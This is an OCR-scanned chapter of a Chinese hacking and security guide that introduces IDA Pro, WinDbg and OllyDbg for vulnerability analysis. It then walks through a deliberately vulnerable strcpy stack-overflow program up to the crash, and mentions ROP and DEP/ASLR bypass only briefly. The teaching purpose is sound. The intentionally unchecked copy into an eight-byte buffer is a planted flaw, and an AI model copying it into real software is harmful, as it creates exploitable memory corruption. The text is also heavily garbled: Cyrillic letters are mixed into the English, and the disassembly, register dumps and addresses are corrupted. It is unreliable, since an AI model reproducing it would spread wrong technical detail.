“心脏 出 血 ”、 年 中 的 shellshock 破 充 、 年 确 的 下 “ 神 洞 ”CVE2014-6332 都 是 危害 等 级 极 
高 的 神 级 漏洞 。 

通过 漏洞 分 析 ， 我 们 不 仅 能 看 到 整个 漏洞 爆发 的 过 程 ， 还 能 找到 利用 它 的 方式 ， 这 里 
白 帽 子 会 积极 联系 厂商 及 时 修复 ， 而 黑客 会 继续 开发 Exploit， 利 用 漏洞 来 发 起 一 个 又 一 个 
的 攻击 。 

无 论 是 出 于 对 用 户 的 保护 ， 还 是 出 于 私人 的 目的 ， 漏 洞 分 析 都 是 必 不 可 少 的 过 程 。 这 
里 笔者 要 特别 提 及 一 下 POC 这 个 概念 ，POC 是 漏洞 验证 的 程序 ， 用 来 验证 在 你 配置 的 漏洞 
分 析 环 境 下 ， 是 否 能 够 成 功 触发 漏洞 ， 而 POC 里 不 包含 恶意 代码 ， 就 好 像 网 上 的 绿色 软件 
一 样 。shellcode 是 传说 中 的 恶意 代码 ， 也 就 是 在 利用 漏洞 的 时 候 ， 通 过 触发 软件 漏洞 使 程 
序 去 执行 shellcode， 从 而 远程 完成 在 目标 计算 机 上 的 操作 。 

在 完成 一 次 完整 的 漏洞 分 析 和 利用 之 前 ， 还 需要 了 解 使 用 哪些 工具 可 以 完成 这 个 过 
程 。 其 实 网 上 对 于 漏洞 分 析 、 利 用 的 工具 很 多 ， 包 括 很 多 大 牛 也 做 出 过 用 来 fozz 的 工具 ， 
以 及 很 多 能 挂 载 在 OD、IDA 上 的 插件 。 当 然 ， 对 于 漏洞 分 析 还 需要 重点 了 解 三 个 “和 神 
器 ”， 这 三 个 神器 可 以 说 是 漏洞 分 析 的 主体 ， 如 果 对 这 三 个 工具 了 如 指 掌 的 话 ， 对 于 现 如 
今 99% 的 软件 漏洞 都 能 拨 开 其 面纱 ， 了 解 其 本 质 。 

在 笔者 为 大 家 分 享 漏洞 分 析 过 程 之 前 ， 在 此 对 这 三 种 工具 做 简单 说 明 ， 当 我 们 了 解 了 
这 三 种 工具 的 使 用 及 分 析 方 法 之 后 ， 就 是 万 事 俱 备 ， 只 从 东风 了 ! 

以 下 内 容 适合 对 IDA Pro、WinDbg 以 及 OllyDbg 不 了 解 的 初学 者 学 习 ， 对 这 三 种 工具 
了 解 或 者 精通 的 读者 可 以 略 过 以 下 内 容 。 有 些 工具 在 下 一 章 也 会 介绍 ， 但 是 侧重 点 不 尽 相 
同 ， 读 者 可 互补 学 习 。 


1. IDA Pro 


ША Pro 是 静态 反 汇编 的 神器 ， 无 论 在 Windows 还 是 Linux 系 统 下 都 有 不 凡 的 表现 。 随 
#IDA Pro 的 更 新 ， 它 现在 也 开始 文 持 动 态 调 试 ， 其 强大 的 反 汇 编 能 力 不 仅 能 将 PE 文件 的 
文件 格式 分 析 得 一 清二 楚 ， 而 且 可 以 将 选择 的 代码 段 反 汇编 成 伪 代 码 的 形式 ， 大 大 纵 短 了 
分 析 枯 燥 的 汇编 代码 的 时 间 。 它 不 仅 能 够 在 Windows 下 完成 文件 的 分 析 ， 同 时 在 令 人 烦恼 
的 Linux 系 统 下 仍旧 可 以 完成 文件 的 分 析 。Linux 下 和 冀 见 的 反 汇 编 方 式 束 是 使 用 GDB， 但 是 
GDB 也 是 在 命令 行 下 使 用 ， 而 且 绝 大 部 分 溢出 需要 -core 的 支持 ， 其 烦琐 程度 令 人 恼火 ， 
但 是 IDA Pro 的 Remote Linux Debugger 功 能 非常 强大 ， 可 以 支持 远程 调试 Linux 下 的 软 
件 ， 这 将 大 大 减少 烦琐 的 命令 行 操作 ， 令 Linux 下 的 软件 ， 进 程 调试 变 得 和 Windows 下 一 
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样 简单 。 

下 面 笔 者 将 针对 IDA Pro 进 行 一 些 入 门 级 的 介绍 ， 描 述 在 进行 漏洞 分 析 过 程 中 需要 的 
一 些 主要 功能 ， 其 实 IDA Pro 本 身 的 功能 非常 强大 ， 其 余 的 功能 需要 读者 慢 慢 学 习 。 

ША Pro 的 主 界面 如 图 8-1 所 示 ， 界 面 上 方 是 沫 单 栏 ， 其 中 包含 了 IDA 的 所 有 工具 ， 磊 
侧 是 函数 栏 ， 右 侧 是 主 窗 口 ， 下 方 是 输出 栏 。 左 侧 的 函数 栏 在 没有 导入 Windows 的 符号 
表 的 时 候 ， 会 将 函数 以 “sub 数字 ”的 形式 表现 ， 其 实 它 代表 着 一 些 函 数 的 定义 ， 比 如 
printf、strcpy 等 ， 当 符号 表 导 入 之 后 ， 这 里 就 会 显示 出 真正 的 函数 值 了 。 


су IDÀ - C:\Program Files\ [DE Computer Solutions\UltraEdit“Uedit32. exe 


File Edii Jump Search View Debugger Dptions Windowns Help 

|a| - > ТТІ v| £ || = х 

|a e|ë m КЕТЕД ЕЛЕК ГЕЙ Jesel |> 
ГЕТ TE E= e SHK- # |: се ци |ВАТАЖ 


anelsen] ЕКА | h H Шеела | 


+ — Window ох | x 国 IDAViewa | x 图 Hesvewa | x В Sractacs | x En Егите | x НЕ Impors | x В Гро | 


Function пате Ftezt:808C73612 ; [BB808008Bñ BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] A| 
Ха ав 407190 -text:8007361C 
Ма а 407160 Техт ийСс7361С > =============== SU B R Ú ИТ 1 N Е =g=w====================================== 
М аЬ 4071380 -text: 98967361С 
заь 401200 „сех; 9967361С 
Уд аЬ 4013ғ0 -text: ийс7361С сив С7361С ркос near ; CODE XREF: <и С23719+114р 
ЗА а 401500 * „ех: 9607261С mou edi, edi 
xa Lb 401570 * „Бех: 00С2361Е риѕћ езі 
“Аа nin * -text:9nc7361F call — Бий C74B36 
Жы бп * -text:96C735620 рор есх 
о. “ „Бех: 80С73025 стр eax, 5 
` т s 4 
四 sb_d018D0 ` -text:p6C73628 jn loc_C736B6 
ЗИ sub 401040 * „text:00C7362E mouzx вах, шока ptr [esi] 
E} зов 4010180 * „Тех: 908673631 спр eax, 5Ch 
МА гЬ 4010Е0 > „Техг: 9973638 jz short loc_G7363B 
А sb_4021ED ” .ЖехЕ:00С/3636 cmp eax, 2Fh 
ЗА ль 402170 * „Техт: 00073639 jnz short loc 673606 
МА 45402220 „бех: 99673638 
Я sub 402200 ‚| „tegt:00C7363B lot С7363В: ; CODE XREF: sub_ 73614187 
а x< 
Хал 402400 |! `>% ехе: В0С7963В поугх eax, word ptr Гесі» 21 
ЗА аЬ 402650 * -text В0Сғ303Ғ стр eax, 5Сһ 
Жл sub 402680 * -text:NnC73642 jz short 10с С7З6ц9 
` при * -text2:960C7360HN с eax, 2Fh 
А а 102710 ер 
Сі + „text:00C73647 ілг short loc 673666 
” а 
k: ры _техЕ : пстзбио 
全 sub_402950 i 
эд Ы 402400 „Тех : 88С73619 loc 73619: ; CODE XREF: sub С73610+261) 
Ë о. < „text:00073649 поугх еах, ит ptr Гез1:41 
Некелік ` Тех: 99673640 стр вах, 
Па 402840 - ¿text:00C73650 jz short _6736В6 
Уй аһ 402070 * „Тех: 00673652 стр eax, 2Fh 
ЗА а 402Е00 ` техг:00с73655 jz short 10с 673686 
МА 1 402Е20 * „Сехт: 8073657 Теа eax, [esi+6] 
ЗА за 402ЕБ0 * „Техг: 90062365Й почгх ecx, word ptr [eax] 
жІ Ш | | < „ЕехЕ: 99073650 xor edx, edx М 
- 002872412 00213812: start 
Е Ори windaw — —— s = Е ок FF 
License: ВВ-ЕЕОЕ-С244-00 L1 censed user 51000 users). ^ 
The hotkeys are F decomile Ее1- сотрі1с 211 А 
1 спе И 532 з Жі. info = п 


524000; 0103; Сап; t find пале при use manual аа 
529000: 0102: Can't find маме (hi 


55 000: 0103; Can't find пале (hint; изе manual ar 3 
пайт па ТОР module C:\Program ғіігзқтПачрғасварс -м 32... 


bytes. pager rize description 一 | 
51062564 2592 8192 ál loc cating memory for b-t 
59061564 65 üz 8192 аттас cating memory НА легия” „аггау. 

IDO 

АС:005СЕ503 | Doan | Disk: 3108 


图 8-1 IDA Pro 主 界面 

界面 右 侧 是 反 汇 编 的 主 窗口 ， 在 IDA View-A 菜 单 中 会 包含 反 汇编 的 结果 ， 其 中 .text 代 
表 看 PE 文件 中 的 字段 ， 后 面 的 8 个 学 节 是 汇编 语言 所 在 的 内 存 地 址 。 

当选 中 茶 段 汇编 语言 后 ， 按 FS 键 会 将 该 段 汇 编 语 言 反 编译 成 伪 代 码 的 形式 ， 这 样 使 逆 
回调 试 变 得 更 为 简单 ， 更 容易 分 析出 漏洞 的 形成 原因 ， 如 图 8-2 所 示 。 

在 对 PE 文件 进行 加 载 并 用 IDA Pro 完 成 分 析 之 后 ， 它 会 将 该 程序 的 代码 结构 以 流程 
图 的 形式 展现 出 来 ， 如 图 8-3 所 示 。 这 人 不仅 方 便 我 们 观察 每 个 模块 之 间 的 关联 与 跳 转 等 头 
系 ， 同 时 再 对 补丁 进行 比较 分 析 ， 从 而 快速 定位 漏洞 位 置 时 也 起 到 了 很 大 作用 。 
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Copyright (с) Microsoft Corporation. 


ххх vait vith pending attach 
Symbol search path is: 


А11 rights reserve 


*** Invalid жжж 


ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ -ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ Э ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЗЕ M 
ж Symbol loading мау Бе unreliable without а symbol sez 
ж Use .synfix to һауе the debugger choose a symbol patt 


* After setting your symbol path, 


use .reload to refres 


ЗЕ ЗЕ ЗЕ 36 36 36 36 ЗЕ З ЭЭЖ 36 Ж 36 3£ ЗЕ ЗЕ Ж ЗЕ 36 36 £ ЭС ЗЕ 3£ E Э 36 36 36 Э ЗЄ ЭЄ ЗЕ ККК Ж 36 36 ЭЄ Э Ж DE Ж 36 £ ЭЄ ЭЄ ЗЕ ЭЄ М 
Executable search 


Medload: 
ModLoad: 
МоаГоаа: 
МоаТоаа: 
Medload: 
МоаТоаа: 
ModLoad : 
HodLoad : 
ModLoad : 
МоаГоаа: 
МоаТоаа: 
МоаТоаа: 
МоТоаа: 
МоаТоаа: 
МоаТоаа: 
МоаГоаа: 
ModLload : 
ModLoad : 
МоаТоаа: 
МоаТоаа: 
HodLoad : 
МоаТоаа: 
ModLoad : 
HodLoad : 
HodLoad : 
МоаТоаа: 
(52с.5с8): 


с==001Ь 


01000000 
7с920000 
7с800000 
79590000 
77220000 
77е50000 
77Ес0000 
??е 0000 
77410000 
77Ье0000 
77Ғ40000 
5сс30000 
5850000 
76610000 
76990000 
770Е0000 
77550000 
77590000 
759420000 
байс0000 
76300000 
62620000 
73Еа0000 
77180000 
74680000 
73640000 


path is: 
0101#000 
?с9Ь3000 
7с91е000 
74984000 
77249000 
77ее2000 
77Ғ4а1000 
77Е39000 
77?4а0000 
77с38000 
77ЕЬ6000 
5сс56000 
591 7а000 
7663а000 
76эаса000 
7717000 
7765000 
776548000 
75а7Е000 
Sadf 7000 
76314000 
6229000 
74005000 
77283000 
746сс000 
7366е000 


сопс0О0ОП00ОПОП0100О0ПОПО0П0О00ООО 


“ИТ НООНО у= ен 32 са! с.е 
:\“WMINDOWMS system32\ntdl1l. 


:\“WMINDOWMS system32\GDI32. 
:NWINDOUSN=sysgstem32SNsUSER3¿ 


:SWIHDOUSNFAppFatchsšsà4icGenz 
:SNSWINDOUSN=gystem32SUIHMM. 
:S5SWINDOWSN=gysgtem32socle32. 
:\WINDOWS\system32\O0LEAUT 
:\“WMINDOWS\system32\MSACH: 


:NWINDOUSNsystem32SIMM32. 
:S5SWINDOUWSN=system32sLPE.DI 
:SNSWINDOWSNsSys=gtem32SsUSFP10. 
:S5sWINDOUSNWUinSzS"z86_Micr 
:\“WMINDOWS\system32\MSCTE. 
:\“WINDOWS\system32\msctf1 


Break instruction exception 一 code 80000003 
eax=7ffd8000 ebx=00000001 есх=00000002 еах-00000003 езі 
езр-7с92120е е=р= 00ар##сс ebp=00abftff4 10р1=0 г 


ntdll ! ПБаВгеакРо:тп!: 


===0023 ds=0023 е==0023 
*** ERROR: Symbol file could пої Бе found. 


#==0038 gs=0000 
Defaulted t 


7с92120е сс int 3 

图 8-7 Windbg 命 令 行 

下 面 介 绍 调试 过 程 中 几 个 主要 的 命令 。 

> kb 一 一 查看 堆栈 调用 ， 通 过 输入 kb 可 以 查看 进入 函数 前 都 调用 了 哪些 函数 ， 从 而 快 
速 回溯 还 原 漏 洞 触发 前 的 场景 ， 有 助 于 快速 定位 漏洞 触发 的 位 置 ， 如 图 8-8 所 示 。 


0:001> kb 


СЪ119ЕВР FRetAddr Агаз to Child 


VARNING: Stack unwind information not available. Foll 
ОПаБЕЕ #4 00000000 00000000 00000008 00006050 ntd311!1Dk 


图 8-8 Windbg kb 命令 


> bp，ba 一 一 下 断 点 ， 其 中 bp 可 以 对 指定 地 址 下 断 点 ; ba 可 以 对 函数 写 入 断 点 ， 执 
行 断 点 。 写 入 断 点 是 指 如 果 在 指定 内 存 区 域 有 新 的 数据 写 入 时 ， 则 触发 断 点 ， 


执行 断 点 是 指 当 该 内 存 区 域 的 内 容 被 执行 时 则 触发 断 点 ， 同 时 bc 可 以 用 来 删除 断 
点 。 也 可 以 通过 bp FFFFFFFF "if(poi(@eax) 一 ).elsefg; }" 的 方式 来 下 条 件 断 点 ， 
该 条 件 断 点 是 指 在 FFFFFFFF 地 址 处 如 果 eax 等 于 某 值 时 暂停 ， 否 则 继续 。 

> dd esp 一 一 查看 某 寄 存 器 内 容 ， 实 例 使 用 的 是 esp 寄 存 器 ， 这 里 可 以 改 eax、ebx 等 ， 
这 里 方便 对 寄存 器 的 跟踪 ， 可 以 很 好 地 分 析 在 漏洞 触发 时 寄存 器 的 变化 状况 等 ， 
如 图 8-9 所 示 。 

> !heap-p-a 一 一 打开 页 堆 央 常 检 测 ， 其 主要 功能 是 在 堆 空间 ， 如 果 此 时 页 堆 发 生 央 常 
则 显示 ， 这 是 对 很 多 堆 溢出 漏洞 调试 非常 实用 的 工具 。 
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АЧ4аге== expression missing from '<ЕОГ»' 
0:001> dd esp 
25970010 00000005 00000004 00000001 
ООзЬЕЕЯО 0001аа3Ъ ЕЕЕЕЕЕЕЕ 7с92е900 
25970030 00000000 00000000 00000000 
00000000 00000008 00006050 00000000 


ЕЕЕЕЕЕЕЕ 00004000 00000001 00000000 
00000000 00000000 00000000 00000560 
00002050 28с7:140 11424е25 1000ddafť 
00ас003с Һ599275а 0000000а 00000001 00000000 


图 8-9 Windbg dd 命令 
以 上 命令 是 在 漏洞 分 析 时 常用 的 命令 ， 通 过 对 这 些 命 令 的 理解 ， 可 以 很 好 地 看 到 寄存 
器 的 变化 ， 定 位 汇编 代码 ， 再 通过 对 汇编 代码 的 回溯 分 析 ， 找 到 漏洞 的 触发 点 以 及 形成 


3. OllyDbg 


OllyDbg 是 对 于 刚 入 门 者 最 推荐 的 动态 调试 工具 ， 它 的 界面 相 比 WinDbg 来 说 非常 友 
好 ， 而 且 对 于 堆栈 状态 的 展示 非常 清晰 。 如 果 说 OllyDbg 是 一 个 界面 的 话 ，WinDbg 就 像 命 
令 行 一 样 ， 同 时 OllyDbg 同 样 支持 二 次 开发 ， 有 很 多 人 将 自己 的 插件 放 在 OllyDbg 里 辅助 
反 汇编 ， 往 往 可 以 事半功倍 。 同 时 OllyDbg 本 身 也 自 带 一 些 非常 好 用 的 插件 ， 比 如 Disable 
DEP， 这 对 于 构造 ROP 链 绕 过 DEP 来 说 会 起 到 很 大 作用 ， 它 能 迅速 帮助 使 用 者 定位 到 构造 
ROP 链 所 需 的 地 址 位 置 。 请 大 家 自己 动手 操作 ， 下 载 OD 工具 并 打开 。 可 以 看 到 在 界面 的 
左上 角 是 反 汇 编 的 主 窗口 ， 右 上 和 角 是 寄存 器 窗口 ， 左 下 角 是 内 存 窗口 ， 右 下 角 是 堆栈 调 
用 窗口 (参考 图 9-1) 。 相 比 WinDbg，OllyDbg 的 界面 操作 起 来 更 直观 ， 可 以 通过 调试 界 
面 ， 选 择 对 程序 单 步调 试 或 者 直接 执行 等 操作 ， 通 过 右 侧 可 以 直接 观察 到 寄存 器 的 变化 情 
况 ， 如 果 标 红 ， 表 示 在 这 一 汇编 代码 结束 后 会 影响 到 该 寄存 器 存放 的 值 ， 这 更 加 有 利于 对 
漏洞 的 回溯 工作 。 

在 菜单 栏 中 可 以 看 到 L、E、M、W 等 按钮 ， 这 些 按钮 代表 OllyDbg 的 其 他 几 个 窗口 ， 
通过 其 他 几 个 窗口 中 的 内 容 可 以 辅助 我 们 进行 反 汇编 调 试 。 

其 中 窗口 表示 堆栈 调用 的 查看 ， 功 能 与 WinDbg 里 的 K 相 同 ， 可 以 查看 该 汇编 代码 前 
的 函数 调用 情况 ， 帮 助 我 们 回溯 汇编 代码 执行 的 流程 〈 见 图 8-10) 。 

кв: read 


Stack ЖЕ с ЈС АЛАНА 

0007FE00 01002180 77? са1с.010021йЕ 

990772720 010125Е9 са1с.01001Е51 calc.<ModuleEntruPoint>+16F 
0007FFCN 70817067 277? Кегпе132 7817964 


图 8-10 ”OllyDbg 堆 栈 调用 窗口 
E 窗 口 表示 可 执行 模块 ， 其 中 可 查看 该 程序 执行 时 调用 的 模块 名 称 、 地 址 等 ， 这 在 构 
造 ROP 链 、ASLR 绕 过 方式 等 方面 都 会 起 很 大 的 作用 〈( 见 图 8-11》。 
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Е 可 执行 模块 [= ах 
Base ( 列 大 小 ЕН Ж Уу |# | 
01000000 999127999! 919124575 | calc 

58SFB0000 881С4088 58Е0696Е | Ясбепка1 

5ñDC00800 0800370080 5ADC1626 | UxTheme 

5СсСс380808 00026000 5ССЗ8Е55 ShimEng 

62628888 00009000 62С22Е80 | РК 

73648888 ВОВЕ ВВВ 73659ЕЕ1 пос Е 1 пе 1 пе 

#7 ЗЕВВВВВ 99068099 7 ЗЕВЕЦ 89 USP18 

7688088 999409981 7468135 МЅСТЕ 

75900000 ВВВЯЕВОВ 759015ЕЦ ІЗЕБЕНІ) 

763808008 880100808! 7638128 ІННЗ2 

76998000 00130 000 76910689 о01е32 

76810000 80802408088 76В12В61 WIHHH 

7709Ғ ВВВВ 80808В0808 гг 8Е 15608 01 ЕЙВЦТЗ2 

77180000 801030888 77184256 comct132 

7?ВВ8888 80881520808 77ВВ1292 HSñCH32 


??топяйаай! апппоппа! 770па лос | СОСТАЫ 


^ 
-1.2608.8 (хрс! ADUAPI32, 60132, KERHEL32, msucrt 
-1.2688.5512 (2 ADUAPI32, 60132, KERHEL32, МЗАСМЗ: 
-88.2900.5512 (ADUAPI32, 60132, КЕННЕІ 32, msucrt 
-1.2688.5512 (iKERHEL32, п 911 
-1.2680.5512 (160132, КЕКМЕ 32, ntdll, USER32, U: 
-1.2680.5512 (2 ЯОЦЯРТЗ2, 60132, IMM32, KERHEL32, 
-0420.2600.5517 ADUAPI32, 60132, КЕНВНЕІ 32, USER32 
-1.2688.5512 (iñDUñPI32, 60132, KERNEL32, msucrt 一 
-1.2680.5512 (2 ADUAPI32, KERNEL32, msucrt, ntdll 
-1.2688.5512 (iñDUñPI32, 60132, КЕКМЕ! 32, пЕй11, 
-1.2680.5512 (2 АрУЯРІЗ2, 60132, КЕННЕІ 32, msucrt 
-1.2608.5512 (3 ADUAPI32, 60132, КЕКМЕ! 32, пЕй11, 
-1.2680.5512 ñDUñPI32, 60132, КЕННЕТ 32, msucrt 
-8 (хрср.08051: АрУЯРІЗ2, 60132, КЕННЕІ 32, msucrt 
-1.2680.5512 (2 ЯОЦЯРТЗ2, 60132, КЕННЕІ 32, msucrt 
v 


图 8-11 olyDbg 可 执行 模块 窗口 。 еле 
M 窗 口 是 内 存 映 射 的 情况 ， 这 里 可 以 看 到 每 个 模块 的 地 址 、 访 问 权 限 等 ， 比 如 通过 E 
窗口 找到 想 要 构造 ROP 链 调用 地 址 的 模块 ， 通 过 分 析 它 的 读 取 权限 来 决定 是 否 使 用 该 模块 
中 的 地 址 ， 或 布置 shellcode 位 置 的 选择 等 〈 见 图 8-12) 。 
ша 


00010000 00001000 
00020000 00001000 


ІШ 


пм с мл мл мл мл м a мл м ле n 
-=h =h =h -. -4 -ь 


00030000 00008000 в Рғіу RW 

8087C080 8880180880 Рғіу RW 

88970000 0888030880 Ш|% of main threa Priu RW 

0008808080 0080803080 Мар |R 

80898080 00002000 Map |R 

OOHAHOOO| 90017000 Bi 人 Priu| RW 

80140000 00006000 n Priu RW 

001B0000 00003000 A Map RW 

801C00080 00016000 Мар |R C:\WINDOWS\system32\unicode .nls 
001Е 0000 00041000 Нар |R С:\ 4140045 \5у5Гет32\1оса1е .п15 
00230000 00051000 Мар |R C:\WINDOWS\system32\sortkey.nls 
00280000 00006000 Нар |R C:\WINDOWS\system32\sorttbls.nls 
80298080 0880851080 Нар |R 

002Е 8080 0080803080 Нар ВЕ 

803480000 00002000 Нар ВЕ 

90380000 00001000 Priu RW 

003C0000 00001000 Priu RW 

003D0000 00006000 A Priu RW 

003Е 8000 00002000 Мар В 

БЕ 0000 00001000 Мар RW 

80588080 00002000 Мар |R 

00510000 00008000 в Priu RW 

88528080 88805080 HB Priu| RW 


895300080 0080803080 Map |R 


图 8-12 OlyDbgň FANO 

OllyDbg 之 所 以 作为 入 门 级 调试 工具 ， 就 在 于 其 简单 易 懂 的 界面 ， 可 以 通过 堆 窗 口 、 
栈 窗口 以 及 寄存 器 窗口 很 直观 地 观察 到 程序 执行 及 漏洞 触发 过 程 中 堆栈 空间 的 内 存 变 化 情 
况 ， 甚 至 可 以 观察 到 当 漏 洞 触 发 时 构造 的 畸形 字符 串 履 盖 栈 空间 及 导致 恶意 代码 执行 的 整 
个 过 程 ， 相 比 OllyDbg、WinDbg 就 需要 更 多 的 命令 来 查看 这 一 过 程 。 

因此 ， 对 于 OllyDbg 的 掌握 有 助 于 初学 者 对 于 漏洞 分 析 的 快速 入 门 ，OllyDbg 同 样 提供 
了 很 多 的 插件 ， 这 里 就 不 一 一 讲解 ， 在 今后 的 学 习 过 程 中 ， 会 逐渐 了 解 到 OD 的 插件 是 如 
何 辅 助 调试 的 。 


C:\WINDOWS\system32\ctype .nls 


8.1.3 strcpy 引 发 的 “血案 ” 


首先 笔者 编写 了 一 个 有 漏洞 的 程序 ， 程 序 中 关键 点 在 于 strcpy 函 数 ， 这 也 是 目前 很 多 栈 
洲 出 漏洞 的 根本 原因 ， 大 多 数 都 是 因为 对 于 数组 边界 检查 不 够 严格 造成 的 〈 见 图 8-13〉。 
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int Flag = B; 
char overflow а|188|-"аааааааааааааааааааааааааааааааааааа” 


图 8-13” 超 长 字符 串 定义 
可 以 看 到 给 overflow_a 赋 值 为 一 个 超 长 学 符 串 ， 这 就 是 触发 漏洞 的 超 长 字符 串 ， 这 也 
方便 后 期 笔者 在 构造 利用 shellcode 时 候 修改 。 
图 8-14 所 示 是 一 段 笔者 触发 漏洞 的 关键 代码 ，strcmp 并 不 是 关键 ， 只 是 之 前 笔者 做 密 
码 绕 过 的 实验 时 使 用 的 ， 这 个 漏洞 的 关键 点 是 下 面 的 strcpy， 可 以 看 到 上 面 构造 的 数组 大 
小 为 8， 而 定义 的 overflow_a 数 组 大 小 为 元素 的 个 数 ， 那 么 当 笔 者 以 超 长 串 拷贝 到 b 数 组 
中 的 时 候 ， 会 造成 多 出 来 的 a 元 素 履 盖 到 栈 中 b 数 组 下 面 的 内 容 ， 造 成 栈 被 破坏 ， 从 而 产 


char b[8]; 

i =strcmp(overflow a,overflow b); 
strcpy(tb,overflow а); 

return 1; 


图 8-14 ”漏洞 触发 关键 代码 
挂 载 WinDbg， 执 行 如 下 程序 。 
可 以 看 到 程序 月 汗 了 ，WinDbg 弹 了 出 来 ， 而 目前 指 回 的 地 址 是 61616161， 也 就 是 a 的 
ASCII 码 〈 十 六 进 制 情况 下 ) ， 这 是 一 片 无 效 的 内 存 空 间 ， 直 白地 说 程序 无 法 读 取 这 段 内 
存 空间 中 的 汇编 语言 继续 执行 程序 ， 导 致 了 程序 崩 尝 ， 如 图 8-15 所 示 。 


(604. 1а8): ` access violat tion 一 “code 20000005 ШЕ second | chance ІІ 
вах=61616161 ebx=7ffdf000 есх=0012##40 ейх=00000000 esi=0042205d edi= 全 
е1р=61616161 езр-0012Еес8 еБр-61616161 10р1-0 пу up ei pl zr па ре 
cs=001b ss=0023 ds=0023 ез-0023 fs -003b gs=0000 её] = 00000246 
61616161 ?? 2??? 


8-15 “程序 崩溃 现场 
当然 如 果 笔 者 要 利用 的 话 ， 会 将 特定 的 shellcode 覆 盖 在 特定 的 空间 使 程序 执行 ， 这 在 
Windows XP 系统 下 是 成 立 的 ， 但 是 目前 大 多 数 系 统 都 会 开启 DEP、ASLR 这 些 内 存 执行 保 
护 、 地 址 随机 化 等 保护 措施 ， 当 然 现 在 的 黑 帽 子 们 也 提供 了 各 种 绕 过 方法 ， 比 如 构造 ROP 
链 、 利 用 虚 表 指针 等 方式 。 
这 里 不 袭 述 。 下 面 来 看 看 栈 中 的 情况 ， 如 图 8-16 所 示 。 


0:000> 99 езр 


0012Е ес 
0012Ееа8 
0012 ее 
0012ЕеЕ8 
00121105 
00121118 


61516161 
сссссс00 
CCCCECCC 
CCCCCCCC 
сесесесс 
61616161 


61616161 
сссссссс 
сссссссс 
сесовесе 
сс 
61616161 


61616161 
сссссссс 
сссссссс 
сеесессс 
сссссссс 
61616161 


61616161 
Gocot 
сссссссс 
сссссесе 
и ты чыш ты ты w. ` 
61616161 


О012ЕЕ2В 
0012ЕЕ38 


61616161 61616161 61616161 61616161 
61616161 00000000 00000000 00000000 


图 8-16 ”程序 崩溃 时 栈 中 情况 
通过 图 8-16 和 图 8-15 可 以 看 到 EBP， 也 就 是 栈 底 已 被 修改 成 61616161， 而 假设 当 
初 为 栈 开 尽 的 是 30h 的 大 小 ， 那 么 此 时 的 大 小 是 ebp-esp〔〈 栈 底 - 栈 顶 ) 48% 61616161- 
0012fec8， 换 句 话说 已 经 破坏 了 栈 平 衡 ， 这 个 栈 也 被 破坏 了 。 
下 面 ， 笔 者 将 以 正 向 调试 的 角度 来 为 大 家 还 原 整个 漏洞 触发 的 过 程 ， 这 在 真正 的 漏洞 
调试 中 也 是 分 析 漏 洞 形 成 原因 以 及 利用 方法 的 最 后 一 步 ， 笔 者 为 大 家 跳 过 的 是 之 前 逆 癌 回 


— 147 — 


EN 黑客 与 安全 技术 指南 


漳 的 整个 过 程 ， 而 这 个 只 有 数 十 行 汇编 代码 的 程序 也 将 略 去 利用 “! heap-p-a” Ла ИЖ 
Ы НУ о 

首先 改 用 OllyDbg 工 具 ， 执 行程 序 并 且 在 程序 main 图 数 的 入 口 点 断 住 〈 见 图 8-17) ， 
假设 这 就 是 一 个 复杂 的 漏洞 程序 还 原 到 触发 点 之 前 的 两 个 函数 。 


00101 ӨВй ВЕ 38204200 mou esi,offset 090422838 ASCII "аааааааааааааааааааааааааааааааааааа" 
. 8070 98 Теа ейі ,[ебр-68] 
‚ ЕЗ:А5 rep mous dword ptr [edi],dword ptr [esi] 


. ñ" mous bute ptr [edi],bute ptr [esi] 
. B9 97999900 mou ecx ВЕ 
33С0 


. xor eax,eax 
. 8070 BD Теа edi,[ebp-43 
‚ ЕЗ:АВ кер stos dword ptr [edi] 
- 66:АВ stos word ptr [edi] 
. stos byte ptr [edi] 
вв 01000000 поч eax,1 
85C Ü test eax,eax 
jz short 8001112 
lea ecx,[ebp-68] 
- 51 push ecx 
е ЕВ ЗЕРЕЕЕЕЕ call 00801005 
. 8305 04 add езр,4 
- 8945 ЕС mou dword ptr Геһр-81|,еах 
. 8370 ЕС 00 cmp dword ptr [ebp-4],0 
. в ВЕ je short 805081101 
. 68 30205200 | push offset 00422030 ASCII “noti” 
. ЕВ 140208000 | call printf Cprintf 
add esp," 
jmp short 00301110 
00101101 > 68 28204200 push offset 00422 028 ASCII "oktm'' 


图 8-17 程序 反 汇编 定位 
略 去 main 函 数 入 口 处 对 于 栈 的 一 系列 操作 ， 在 最 项 上 的 函数 可 以 看 到 将 偏 移 尾 
00422038 处 保存 的 ASCII 码 存 入 ESI， 其 实 当 使 用 OllyDbg 时 可 以 在 栈 内 看 到 将 这 一 串 a 推 入 
栈 中 的 过 程 ， 而 黄色 标记 的 一 行 中 的 call 正 是 漏洞 触发 的 关键 函数 ， 相 当 于 触发 漏洞 的 最 
后 一 层 函 数 ， 那 么 在 这 个 函数 下 断 点 跟 进 看 一 看 〈 见 图 8-18) 。 
. 83EC НС sub евр, #6 


00401026 |. 53 push ebx 
56 push esi 
57 push edi 
8070 B4 Теа ейі „Гевр-с | 
B9 139999989 | mou есх,13 
B8 СССССССС mou eax,CCCCCCCC 
ЕЗ :АВ кер stos dword ptr [еді] 
68 162042009 |push offset 00322601С ASCII "1235567" 
mou eax,duord ptr [ebp+8] 


push еах 


са11 strcmp [strcmp 
add езр,8 

mou dword ptr [ebp-4],eax 

mou есх :dword ptr [ebp+8] 

push есх 

Теа edx,[ebp-erc] 


E8 Ғ/ 000080 
8305 08 
8855 ЕС 


图 8-18 程序 反 汇编 定位 

可 以 看 到 ，strcpy 函 数 此 时 push 了 ecx 及 edx，ecx 赋 值 是 ebp+8， 也 就 是 该 函数 的 第 一 个 
参数 ， 就 是 上 面 传 入 的 aaaaaaaaaaaaaaa， 那 么 下 面 edx 就 应 该 是 我 们 的 b8 数 组 了 ， 这 样 可 
